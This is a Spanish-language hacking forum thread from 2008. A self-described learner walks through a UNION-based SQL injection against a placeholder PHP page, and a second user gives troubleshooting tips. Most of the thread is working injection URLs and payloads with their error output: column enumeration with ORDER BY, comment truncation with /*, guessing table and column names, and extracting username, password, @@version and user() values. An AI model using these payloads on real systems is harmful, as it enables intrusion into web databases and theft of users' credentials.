MySQL SQL injection no regresa los datos

Iniciado por 6666, 23 Mayo 2008, 22:10 PM

0 Miembros y 1 Visitante están viendo este tema.

6666

Bueno he hecho lo siguiente ..

supongamos que tenemos esto.

http://www.site.com/id.php?numero=

bueno enpese haciendo esto ..

http://www.site.com/id.php?numero=-1 order by 1

pero apenas lo hice problemas y tiro el siguiente error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY cuando.IDCUANDO DESC LIMIT 0, 10' at line 1

pero eso se arreglo de la siguiente forma ..

http://www.site.com/id.php?numero=-1 order by 1/*

asi que comente la linea y procedi.


http://www.site.com/id.php?numero=-1 order by 1/*
http://www.site.com/id.php?numero=-1 order by 2/*
http://www.site.com/id.php?numero=-1 order by 3/*
http://www.site.com/id.php?numero=-1 order by 4/*
http://www.site.com/id.php?numero=-1 order by 5/*
hasta que:
http://www.site.com/id.php?numero=-1 order by 6/*
Unknown column '6' in 'order clause'

luego:

http://www.site.com/id.php?numero=-1 union all select 1,2,3,4,5/*

tiro un 2 asi que hice esto.

http://www.site.com/id.php?numero=-1 union all select 1,table_name,3,4,5 from information_schema.tables where table_schema = database()/*

pero obtuve:

SELECT command denied to user 'alguien'@'localhost' for table 'tables'

entonces como no podia y tenia suficientes datos me puse a averiguar las tablas:

http://www.site.com/id.php?numero=-1 union all select 1,concat(username),3,4,5 from users/*

pero me tiro:

Table 'db.users' doesn't exist

asi que probe con otro y puse "usuarios"

http://www.site.com/id.php?numero=-1 union all select 1,concat(username),3,4,5 from usuarios/*

y vaya le pegue! tiro:

Unknown column 'username' in 'field list'

asi que puse otros nombres para reemplazar a "username" hasta que al poner "usuario":

http://www.site.com/id.php?numero=-1 union all select 1,concat(usuario),3,4,5 from usuarios/*

sii! le habia pegado.

pero ...

me tiro la pagina pero no los datos que contenia .. :S.

no habia nada màs que unos : y probe:

http://www.site.com/id.php?numero=-1 union all select 1,concat(pass),3,4,5 from usuarios/*

y tambien le pegue! pero  estaban los 2 puntos .. se que no eran nada pero por las dudas los use para iniciar sesiòn y no tuve resultados.

tambien mire el codigo fuente quizas estaba abajo del flash pero no encontre nada.

por que la pagina no me tira los datos contenidos?



si alguien me puede ayudar estoy aprendiendo  :rolleyes:


ChElAnO


hola,

si no te muestra el contenido es porque estas poniendolo en una posicion que no es la correcta, es decir:

union all select 1,concat(usuario),3,4,5 from usuarios/*

sabemos que se tiene 5 columnas. Entonces deducimos que algunas son mostradas y otras no. debes probar lo siguiente

union all select concat(usuario),2,3,4,5 from usuarios/*
union all select 1,concat(usuario),3,4,5 from usuarios/*
union all select 1,2,concat(usuario),4,5 from usuarios/*
...
....

hasta que en algun lado lo muestre. No sólo mires la pagina web, mira el codigo fuente en busca de algo distinto. Puedes probar tambien llamando a algun otro dato como @@version, o user()

saludos

6666

he probado en la 1,2,3,4,5 pero nada y es màs cuando hago esto:

-1+union+all+select+1,2,concat(usuario,pass,@@version,user()),4,5+from+usuarios/*

en cualquiera y me larga el user y la version.

hasta probe algo asi:

-1+union+all+select+1,2,concat(usuario,pass,@@version,user()),4,5+from+usuarios+LIMIT 1,1/*

tendria que si ese lugar esta vacio me larga el que viene.

pero sigo sin resultados bueno gracias por la ayuda igual.